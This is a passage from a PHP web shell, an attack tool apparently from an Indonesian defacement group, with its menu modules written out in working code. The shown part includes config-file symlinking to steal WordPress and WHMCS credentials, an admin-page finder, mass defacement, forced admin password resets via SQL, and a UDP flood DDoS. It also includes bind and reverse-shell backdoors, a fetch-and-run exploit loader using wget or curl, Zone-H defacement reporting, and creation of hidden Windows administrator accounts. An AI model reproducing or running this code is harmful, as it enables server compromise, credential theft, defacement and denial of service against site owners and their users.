  1214. symlink('/home/'.$us.'/public_html/blog/configuration.php',$r.$us.'..joomla');symlink('/home/'.$us.'/public_html/wp/wp-config.php',$r.$us.'..wp-config');
  1215. symlink('/home/'.$us.'/public_html/wordpress/wp-congig.php',$r.$us.'..wordpress');symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
  1216. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  1217. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  1218. symlink('/home/'.$us.'/public_html/secure/configuration.php',$r.$us.'..securewhmcs');
  1219. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-clients');
  1220. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-client');
  1221. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-billing');
  1222. symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-config');
  1223. }
  1224. echo'<center>berhasil!! <a href="config_grab" target="_blank">touch me senpai..</a></center>';
  1225. }
  1226. }elseif ($_GET['a']=='af') {
  1227. echo'<div class="w3-container w3-center"><h3 class="w3-indigo w3-text-shadow w3-text-white">Admin finder</h3>';
  1228. echo'<form method="POST" action="">site : <input type="text" name="url" style="width:260px" value="http://" class="w3-input w3-animate-input" style="width:300px;"><input type="submit" name="submit" value="find[!]"  class="w3-btn w3-indigo" /><br><br>';
  1229. function xss_protect($data, $strip_tags = false, $allowed_tags = "") {
  1230.     if($strip_tags) {
  1231.   $data = strip_tags($data, $allowed_tags . "<b>");
  1232.     }
  1233.  
  1234.     if(stripos($data, "script") !== false) {
  1235.   $result = str_replace("script","scr<b></b>ipt", htmlentities($data, ENT_QUOTES));
  1236.     } else {
  1237.   $result = htmlentities($data, ENT_QUOTES);
  1238.     }
  1239.  
  1240.     return $result;
  1241. }
  1242. function urlExist($url)
  1243. {
  1244.     $handle   = curl_init($url);
  1245.     if (false === $handle)
  1246.     {
  1247.     return false;
  1248.     }
  1249.     curl_setopt($handle, CURLOPT_HEADER, false);
  1250.     curl_setopt($handle, CURLOPT_FAILONERROR, true);
  1251.     curl_setopt($handle, CURLOPT_HTTPHEADER, Array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15") ); // request as if Firefox
  1252.     curl_setopt($handle, CURLOPT_NOBODY, true);
  1253.     curl_setopt($handle, CURLOPT_RETURNTRANSFER, false);
  1254.     $connectable = curl_exec($handle);
  1255.     curl_close($handle);
  1256.     return $connectable;
  1257. }
  1258.     if(isset($_POST['submit']) && isset($_POST['url']))
  1259.     {
  1260.   $url= htmlentities(xss_protect($_POST['url']));
  1261.   if(filter_var($url, FILTER_VALIDATE_URL))
  1262.   {
  1263.     $trying = array(':2082',':2083','a_admins/','admin/','adminweb/','po-admin','index.php?q=admin','administrator/','admin/admin.php','cpanel','admin3/','admin4/','admin5/','usuarios/',
  1264.     'usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/',
  1265.     'panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php',
  1266.     'admin/index.php','admin/login.php','admin/admin.php','admin/account.php','admin_area/admin.php',
  1267.     'admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html',
  1268.     'admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php',
  1269.     'bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admin.php',
  1270.     'admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
  1271.     'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html',
  1272.     'panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php',
  1273.     'nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php',
  1274.     'administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
  1275.     'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html',
  1276.     'login.php','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php',
  1277.     'pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
  1278.     'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php',
  1279.     'adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php',
  1280.     'admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
  1281.     'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html',
  1282.     'login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html',
  1283.     'panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html',
  1284.     'adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
  1285.     'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php',
  1286.     'adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php',
  1287.     'panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php',
  1288.     'adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
  1289.     'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','admin.asp','admin/admin.asp',
  1290.     'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp',
  1291.     'bb-admin/admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','user.asp','webadmin/index.asp',
  1292.     'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp',
  1293.     'adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp',
  1294.     'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp',
  1295.     'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
  1296.     'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp');
  1297.  echo "<table class='w3-table w3-border'><thead class='w3-indigo'><th>Website</th><th>Status</th></thead>";
  1298.     foreach($trying as $sec)
  1299.     {
  1300.     $urll=$url.'/'.$sec;
  1301.    
  1302.     if(urlExist($urll))
  1303.     {
  1304.     echo '<tr class="w3-green"><td><a href="'.$urll.'">'.$urll.'</a></td><td><i><b><u>FOUND</u></b></i></td></tr>';
  1305.     exit;
  1306.     }
  1307.     else
  1308.     {
  1309.     echo '<tr class="w3-grey"><td>'.$urll.'</td><td>NOT FOUND</td></tr>';
  1310.     }  
  1311.     }
  1312.     echo '<tr class="w3-orange w3-center"><td colspan=2>Could not find admin page.[!]</td></tr>';
  1313.   }
  1314.   else
  1315.   {
  1316.     echo '<tr class="w3-indigo w3-centere"><td colspan=2>invalid url Enteindigo</td></tr>';    
  1317.   }
  1318.   echo "</table>";
  1319.     }
  1320. }elseif ($_GET['a']=='md') {
  1321.     echo'<div class="w3-container w3-center">
  1322.     <h3 class="w3-center w3-indigo w3-text-shadow w3-text-white">   Mass deface </h3>
  1323.     <small> by indoXploit </small>';
  1324.     function sabun_massal($dir,$namafile,$isi_script) {
  1325.         if(is_writable($dir)) {
  1326.             $dira = scandir($dir);
  1327.             foreach($dira as $dirb) {
  1328.                 $dirc = "$dir/$dirb";
  1329.                 $lokasi = $dirc.'/'.$namafile;
  1330.                 if($dirb === '.') {
  1331.                     file_put_contents($lokasi, $isi_script);
  1332.                 } elseif($dirb === '..') {
  1333.                     file_put_contents($lokasi, $isi_script);
  1334.                 } else {
  1335.                     if(is_dir($dirc)) {
  1336.                         if(is_writable($dirc)) {
  1337.                             echo "[<font color=indigo>DONE</font>] $lokasi<br>";
  1338.                             file_put_contents($lokasi, $isi_script);
  1339.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  1340.                         }
  1341.                     }
  1342.                 }
  1343.             }
  1344.         }
  1345.     }
  1346.     function sabun_biasa($dir,$namafile,$isi_script) {
  1347.         if(is_writable($dir)) {
  1348.             $dira = scandir($dir);
  1349.             foreach($dira as $dirb) {
  1350.                 $dirc = "$dir/$dirb";
  1351.                 $lokasi = $dirc.'/'.$namafile;
  1352.                 if($dirb === '.') {
  1353.                     file_put_contents($lokasi, $isi_script);
  1354.                 } elseif($dirb === '..') {
  1355.                     file_put_contents($lokasi, $isi_script);
  1356.                 } else {
  1357.                     if(is_dir($dirc)) {
  1358.                         if(is_writable($dirc)) {
  1359.                             echo "[<font color=indigo>DONE</font>] $dirb/$namafile<br>";
  1360.                             file_put_contents($lokasi, $isi_script);
  1361.                         }
  1362.                     }
  1363.                 }
  1364.             }
  1365.         }
  1366.     }
  1367.     if($_POST['start']) {
  1368.         if($_POST['tipe_sabun'] == 'mahal') {
  1369.             echo "<div style='margin: 5px auto; padding: 5px'>";
  1370.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1371.             echo "</div>";
  1372.         } elseif($_POST['tipe_sabun'] == 'murah') {
  1373.             echo "<div style='margin: 5px auto; padding: 5px'>";
  1374.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1375.             echo "</div>";
  1376.         }
  1377.     } else {
  1378.     echo "<center>";
  1379.     echo "<form method='post'>
  1380.     <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  1381.     <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  1382.     <font style='text-decoration: underline;'>Folder:</font><br>
  1383.     <input type='text' name='d_dir' value='$_GET[i]' style='width: 450px;' height='10' class='w3-input w3-animate-input'><br>
  1384.     <font style='text-decoration: underline;'>Filename:</font><br>
  1385.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10' class='w3-input w3-animate-input'><br>
  1386.     <font style='text-decoration: underline;'>Index File:</font><br>
  1387.     <textarea name='script' style='width:700px; height:400px;' class='w3-indigo w3-code'>JOYFULL KAWAII TRY TO BE THE BEST ;)</textarea><br>
  1388.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;' class='w3-btn w3-indigo'>
  1389.     </form></center>";
  1390.     }
  1391. }elseif ($_GET['a']=='jrp') {
  1392.     echo "
  1393. <div class='w3-container w3-center'>
  1394. <h3 class='w3-indigo w3-text-white w3-text-shadow w3-center'>  joomla reset password </h3><br>";
  1395.     if(empty($_POST['pwd'])){
  1396. echo "<FORM method='POST'><table class='w3-table w3-striped' > <tr class='w3-indigo w3-text-shadow'><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  1397. <input  type='text' name='localhost' value='localhost' class='w3-input' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  1398. <input  type='text' name='database' value='database' class='w3-input'/></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  1399. <input type='text' name='username' value='db_user' class='w3-input'/></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  1400. <input type='password' name='password' value='' class='w3-input'/></td></tr>
  1401. <tr><td>&nbsp;&nbsp;new user</td><td>
  1402. <input name='admin' value='admin' class='w3-input'/></td></tr>
  1403. <tr><td>&nbsp;&nbsp;new password(12345) </td><td>
  1404. <input class='w3-input '  name='pwd' value='e10adc3949ba59abbe56e057f20f883e' disabled></td></tr><tr><td colspan='2'>
  1405.  
  1406. <input  type='submit' value='change!' name='send' class='w3-btn w3-indigo w3-btn-block' /></FORM>
  1407. </td></tr> </table><br><br><br><br>
  1408. ";
  1409. }else{
  1410. $localhost = $_POST['localhost'];
  1411. $database  = $_POST['database'];
  1412. $username  = $_POST['username'];
  1413. $password  = $_POST['password'];
  1414. $pwd   = $_POST['pwd'];
  1415. $admin = $_POST['admin'];
  1416. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  1417. @mysql_select_db($database) or die(mysql_error());
  1418. $hash = crypt($pwd);
  1419. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
  1420. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
  1421. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
  1422. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
  1423. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
  1424. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
  1425. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
  1426. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
  1427. if($SQL){
  1428. echo "<b>Succesfully! password : 12345";
  1429. }
  1430. }
  1431. }elseif ($_GET['a']=='wprp') {
  1432.     echo "
  1433. <div class='w3-container w3-center'>
  1434. <h3 class='w3-indigo w3-text-shadow w3-text-white'>  wordpress reset password  </h3><br>";
  1435.  
  1436.   if(empty($_POST['pwd'])){
  1437.  
  1438. echo "<FORM method='POST'>
  1439. <table  class='w3-table w3-striped'> <tr><th colspan='2' class='w3-indigo w3-text-shadow'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Hostname</td><td>
  1440. <input class='w3-input' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  1441. <input class='w3-input' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  1442. <input class='w3-input' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  1443. <input class='w3-input' type='text' name='password' value='**' /></td></tr>
  1444. <tr><td>&nbsp;&nbsp;User baru</td><td>
  1445. <input class='w3-input' class='inputz' type='text' name='admin' value='admin' /></td></tr>
  1446. <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
  1447. <input class='w3-input'  type='text' name='pwd' value='123456' /></td></tr><tr><td colspan='2'>
  1448.  
  1449. <input  type='submit' value='change!' name='send' class='w3-btn w3-btn-block w3-indigo' /></FORM>
  1450. </td></tr> </table><br><br><br><br>
  1451. ";
  1452. }else{
  1453. $localhost = $_POST['localhost'];
  1454. $database  = $_POST['database'];
  1455. $username  = $_POST['username'];
  1456. $password  = $_POST['password'];
  1457. $pwd   = $_POST['pwd'];
  1458. $admin = $_POST['admin'];
  1459.  
  1460.  
  1461.  @mysql_connect($localhost,$username,$password) or die(mysql_error());
  1462.  @mysql_select_db($database) or die(mysql_error());
  1463.  
  1464. $hash = crypt($pwd);
  1465. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
  1466. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
  1467. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
  1468. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
  1469. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
  1470. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
  1471. $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
  1472.  
  1473.  
  1474. if($a4s){
  1475. echo "<b> Successfully! password changed!</b> ";
  1476. }
  1477.  
  1478. }
  1479. }elseif ($_GET['a']=='ddos') {
  1480. echo"<div class='w3-container w3-center'><h3 class='w3-indigo w3-text-shadow w3-text-white'>DDoS Tools</h3><br><br>";
  1481. echo'<table class="w3-table w3-striped"><tr><tr><td>IP Target</td><td>:</td><td><input type="text" class="w3-input" name="ip" size="48" maxlength="25"  value = "0.0.0.0" onblur = "if ( this.value==\'\' ) this.value = \'0.0.0.0\';" onfocus = " if ( this.value == \'0.0.0.0\' ) this.value = \'\';"/></td></tr><tr><td>Time</td><td>:</td><td><input type="text" class="w3-input" name="time" size="48" maxlength="25"  value = "time (in seconds)" onblur = "if ( this.value==\'\' ) this.value = \'time (in seconds)\';" onfocus = " if ( this.value == \'time (in seconds)\' ) this.value = \'\';"/>
  1482. </td></tr><tr><td>Port</td><td>:</td><td><input type="text" class="w3-input" name="port" size="48" maxlength="5"  value = "port" onblur = "if ( this.value==\'\' ) this.value = \'port\';" onfocus = " if ( this.value == \'port\' ) this.value = \'\';"/></td></tr></tr></table></b><br><input type="submit" class="w3-btn w3-indigo" name="fire" value="  Firee !!!   "></form></div>';
  1483. $submit = $_POST['fire'];
  1484. if (isset($submit)) {
  1485. $packets = 0;
  1486. $ip = $_POST['ip'];
  1487. $rand = $_POST['port'];
  1488. set_time_limit(0);
  1489. ignore_user_abort(FALSE);
  1490. $exec_time = $_POST['time'];
  1491. $time = time();
  1492. print "Flooded: $ip on port $rand <br><br>";
  1493. $max_time = $time+$exec_time;
  1494. for($i=0;$i<65535;$i++){
  1495.         $out .= "X";
  1496. }
  1497. while(1){
  1498. $packets++;
  1499.         if(time() > $max_time){
  1500.                 break;
  1501.         }        
  1502.         $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  1503.         if($fp){
  1504.                 fwrite($fp, $out);
  1505.                 fclose($fp);
  1506.         }
  1507. }
  1508. echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
  1509. }
  1510. }elseif ($_GET['a']=='net') {
  1511. if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
  1512.     $port = trim($_POST['port']);
  1513.     $passwrd = trim($_POST['bind_pass']);
  1514.     tulis("bdc.c",$port_bind_bd_c);
  1515.     exe("gcc -o bdc bdc.c");
  1516.     exe("chmod 777 bdc");
  1517.     @unlink("bdc.c");
  1518.     exe("./bdc ".$port." ".$passwrd." &");
  1519.     $scan = exe("ps aux");
  1520.     if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  1521.     else { $msg =  "<p>Process not found running, backdoor not setup successfully.</p>"; }
  1522. }
  1523. // bind connect with perl
  1524. elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
  1525.     $port = trim($_POST['port']);
  1526.     $passwrd = trim($_POST['bind_pass']);
  1527.     tulis("bdp",$port_bind_bd_pl);
  1528.     exe("chmod 777 bdp");
  1529.     $p2=which("perl");
  1530.     exe($p2." bdp ".$port." &");
  1531.     $scan = exe("ps aux");
  1532.     if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  1533.     else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
  1534. }
  1535. // back connect with c
  1536. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
  1537.     $ip = trim($_POST['ip']);
  1538.     $port = trim($_POST['backport']);
  1539.     tulis("bcc.c",$back_connect_c);
  1540.     exe("gcc -o bcc bcc.c");
  1541.     exe("chmod 777 bcc");
  1542.     @unlink("bcc.c");
  1543.     exe("./bcc ".$ip." ".$port." &");
  1544.     $msg = "Now script try connect to ".$ip." port ".$port." ...";
  1545. }
  1546. // back connect with perl
  1547. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
  1548.     $ip = trim($_POST['ip']);
  1549.     $port = trim($_POST['backport']);
  1550.     tulis("bcp",$back_connect);
  1551.     exe("chmod +x bcp");
  1552.     $p2=which("perl");
  1553.     exe($p2." bcp ".$ip." ".$port." &");
  1554.     $msg = "Now script try connect to ".$ip." port ".$port." ...";
  1555. }
  1556. elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
  1557. {
  1558.     $pilihan = trim($_POST['pilihan']);
  1559.     $wurl = trim($_POST['wurl']);
  1560.     $namafile = download($pilihan,$wurl);
  1561.     if(is_file($namafile)) {
  1562.    
  1563.     $msg = exe($wcmd);
  1564.     }
  1565.     else $msg = "error: file not found $namafile";
  1566. }
  1567. echo'<div class="w3-container w3-center"><h3 class="w3-indigo w3-text-white w3-text-shadow">NetSploit</h3><table class="w3-table w3-striped w3-center"><tr class="w3-indigo w3-center"><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr><tr><td>';
  1568. echo'<table class="w3-table w3-striped"><form method="post" ><tr><td>Port</td><td><input class="w3-input" type="text" name="port" size="26" value="'.$bindport.'"></td></tr><tr><td>Password</td><td><input class="w3-input" type="text" name="bind_pass" size="26" value="'.$bindport_pass.'"></td></tr><tr><td>Use</td><td style="text-align:justify"><p><select class="w3-input" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
  1569. <input class="w3-btn w3-indigo" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form></table>';
  1570. echo'</td><td>';
  1571. echo'<table class="w3-table w3-striped"><form method="post"><tr><td>IP</td><td><input class="w3-input" type="text" name="ip" size="26" value="'.((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")).'"></td></tr><tr><td>Port</td><td><input class="w3-input" type="text" name="backport" size="26" value="'.$bindport.'"></td></tr><tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="w3-input" name="use"><option value="Perl">Perl</option><option value="C">C</option></select><input type="submit" name="backconn" value="Connect" class="w3-btn w3-indigo" style="width:120px"></td></tr></form></table>';
  1572. echo'</td><td>';
  1573. echo'<table class="w3-table w3-striped"><form method="post" ><tr><td>url</td><td><input class="w3-input" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr><tr><td>cmd</td><td><input class="w3-input" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td></tr><tr><td><select size="1" class="w3-input" name="pilihan"><option value="wwget">wget</option><option value="wlynx">lynx</option><option value="wfread">fread</option><option value="wfetch">fetch</option><option value="wlinks">links</option><option value="wget">GET</option><option value="wcurl">curl</option></select></td><td colspan="2"><input type="submit" name="expcompile"  value="Go" style="width:246px;" class="w3-btn w3-indigo"></td></tr></form></table>';
  1574. echo'</td></tr></table><div style="text-align:center;margin:2px;">'.$msg.'</div></div>';
  1575. }elseif ($_GET['a']=='zh') {
  1576. echo'<div class="w3-container w3-center"><h3 class="w3-indigo w3-text-shadow w3-text-shadow"> Zone-H Mass Notifer </h3>';
  1577. echo'<form method="post"><center><input type="text" name="depecer" style="width:500px" placeholder="defacer" class="w3-input"><br><textarea name="url"  placeholder="http://korban.com" style="width:500px;height:300px;" class="w3-indigo w3-code"></textarea><br><input type="submit" name="go" value="submit" class="w3-btn w3-indigo"></form>';
  1578. $url = explode("\r\n", $_POST['url']);
  1579. $go = $_POST['go'];
  1580. function kirim($target,$hacker) {
  1581.     $ch = curl_init();
  1582.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1583.           curl_setopt($ch, CURLOPT_URL, "http://zone-h.org/notify/single");
  1584.           curl_setopt($ch, CURLOPT_POST, true);
  1585.           curl_setopt($ch, CURLOPT_POSTFIELDS, array(
  1586.             "defacer" => $hacker,
  1587.             "domain1" => $target,
  1588.             "hackmode" => "1",
  1589.             "reason" => "1",
  1590.             ));
  1591.     $res = curl_exec($ch);
  1592.           curl_close($ch);
  1593.     return preg_match("/<font color=\"indigo\">OK<\/font><\/li>/", $res);
  1594. }
  1595. if($go) {
  1596.     foreach($url as $sites) {
  1597.         if(kirim($sites,$_POST['depecer'])) {
  1598.             echo "<br>[ OK ] => $sites <br>";
  1599.         } else {
  1600.             echo "<br>[ ERROR ] => $sites <br>";
  1601.         }
  1602.     }
  1603. }
  1604.  
  1605. }elseif ($_GET['a']=='em') {
  1606. $e=function_exists('mail');
  1607.     if($e){
  1608.     echo "<div class='w3-container w3-center'><h3 class='w3-indigo w3-text-shadow w3-text-white'> Email </h3><br>";
  1609.     echo"<form method='post' ><table class='w3-table w3-striped'><tr><td>from :</td><td><input type='text' name='from' value='shutdown57@indonesia.go.id' class='w3-input' ></td></tr><tr><td>For:</td><td><input type='text' name='for' value='admin@".$_SERVER['HTTP_HOST']."' class='w3-input'></td></tr><tr><td>Subject:</td><td><input type='text' name='subject' value='patch ur site!' class='w3-input' ></td></tr><tr><td>COntent:</td><td><textarea name='cont' style='width:100%;height:300px' class='w3-indigo w3-code'>please..patch ur face! ur face is bad :p </textarea></td></tr><tr><td colspan='2'><input type='submit' name='sent' value='send!!' class='w3-btn w3-indigo w3-btn-block' ></td></tr></table></form>";
  1610. }else{
  1611.     echo" mail() function does not exists in this website!";
  1612. }
  1613. if(isset($_POST['sent'])){
  1614.     if(mail($_POST['for'],$_POST['subject'],$_POST['cont'],$_POST['from'])){
  1615.         echo "send!!".$_POST['for'];
  1616.     }else{
  1617.         echo"failed !!!";
  1618.     }
  1619. }
  1620. }elseif ($_GET['a']=='sym') {
  1621.     system('ln -s / achan.txt');
  1622. $hta ="Options Indexes FollowSymLinks\nDirectoryIndex ssssss.htm\nAddType txt .php\nAddHandler txt .php";
  1623. $file = fopen(".htaccess","w+");
  1624. $write = fwrite ($file ,$hta);
  1625. $sym = symlink("/","achan.txt");
  1626. $rt="<br><a href='achan.txt' TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
  1627. touch me senpai..</b></font></a></center>";
  1628. echo "<center><br><br><b>Done.. !</b><br>".$rt;
  1629. }elseif ($_GET['a']=='rdp') {
  1630.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1631. echo "<div class='w3-container w3-center'><h3 class='w3-indigo w3-center w3-text-shadow w3-text-white'>Remote Desktop Protocol Tools</h3>";
  1632.         if($_POST['create']) {
  1633.             $user = htmlspecialchars($_POST['user']);
  1634.             $pass = htmlspecialchars($_POST['pass']);
  1635.             if(preg_match("/$user/", exe("net user"))) {
  1636.                 echo "[INFO] -> <font color=indigo>user <font color=indigo>$user</font> already exists</font>";
  1637.             } else {
  1638.                 $add_user   = exe("net user $user $pass /add");
  1639.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  1640.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  1641.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  1642.                 echo "[ RDP ACCOUNT INFO ]<br>
  1643.                 ------------------------------<br>
  1644.                 IP: <font color=indigo>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
  1645.                 Username: <font color=indigo>$user</font><br>
  1646.                 Password: <font color=indigo>$pass</font><br>
  1647.                 ------------------------------<br><br>
  1648.                 [ STATUS ]<br>
  1649.                 ------------------------------<br>
  1650.                 ";
  1651.                 if($add_user) {
  1652.                     echo "[add user] -> <font color='indigo'>Successfully :D</font><br>";
  1653.                 } else {
  1654.                     echo "[add user] -> <font color='indigo'>Failed !</font><br>";
  1655.                 }
  1656.                 if($add_groups1) {
  1657.                     echo "[add localgroup Administrators] -> <font color='indigo'>Successfully :D</font><br>";
  1658.                 } elseif($add_groups2) {
  1659.                     echo "[add localgroup Administrator] -> <font color='indigo'>Successfully :D</font><br>";
  1660.                 } elseif($add_groups3) {
  1661.                     echo "[add localgroup Administrateur] -> <font color='indigo'>Successfully :D</font><br>";
  1662.                 } else {
  1663.                     echo "[add localgroup] -> <font color='indigo'>Failed !</font><br>";
  1664.                 }
  1665.                 echo "------------------------------<br>";
  1666.             }
  1667.         } elseif($_POST['s_opsi']) {
  1668.             $user = htmlspecialchars($_POST['r_user']);
  1669.             if($_POST['opsi'] == '1') {
  1670.                 $cek = exe("net user $user");
  1671.                 echo "Checking username <font color=indigo>$user</font> ....... ";
  1672.                 if(preg_match("/$user/", $cek)) {
  1673.                     echo "[ <font color=indigo>already Exists</font> ]<br>
  1674.                     ------------------------------<br><br>
  1675.                     <pre>$cek</pre>";
  1676.                 } else {
  1677.                     echo "[ <font color=indigo>Not Exists</font> ]";
  1678.                 }
  1679.             } elseif($_POST['opsi'] == '2') {
  1680.                 $cek = exe("net user $user achan");
  1681.                 if(preg_match("/$user/", exe("net user"))) {
  1682.                     echo "[change password: <font color=indigo>achan</font>] -> ";
  1683.                     if($cek) {
  1684.                         echo "<font color=indigo>Successfully :D</font>";
  1685.                     } else {
  1686.                         echo "<font color=indigo>Successfully :D</font>";
  1687.                     }
  1688.                 } else {
  1689.                     echo "[INFO] -> <font color=indigo>user <font color=indigo>$user</font> Not Exists</font>";
  1690.                 }
  1691.             } elseif($_POST['opsi'] == '3') {
  1692.                 $cek = exe("net user $user /DELETE");
  1693.                 if(preg_match("/$user/", exe("net user"))) {
  1694.                     echo "[remove user: <font color=indigo>$user</font>] -> ";
  1695.                     if($cek) {
  1696.                         echo "<font color=indigo>Successfully :D</font>";
  1697.                     } else {
  1698.                         echo "<font color=indigo>Failed :p</font>";
  1699.                     }
  1700.                 } else {
  1701.                     echo "[INFO] -> <font color=indigo>user <font color=indigo>$user</font> not exists</font>";
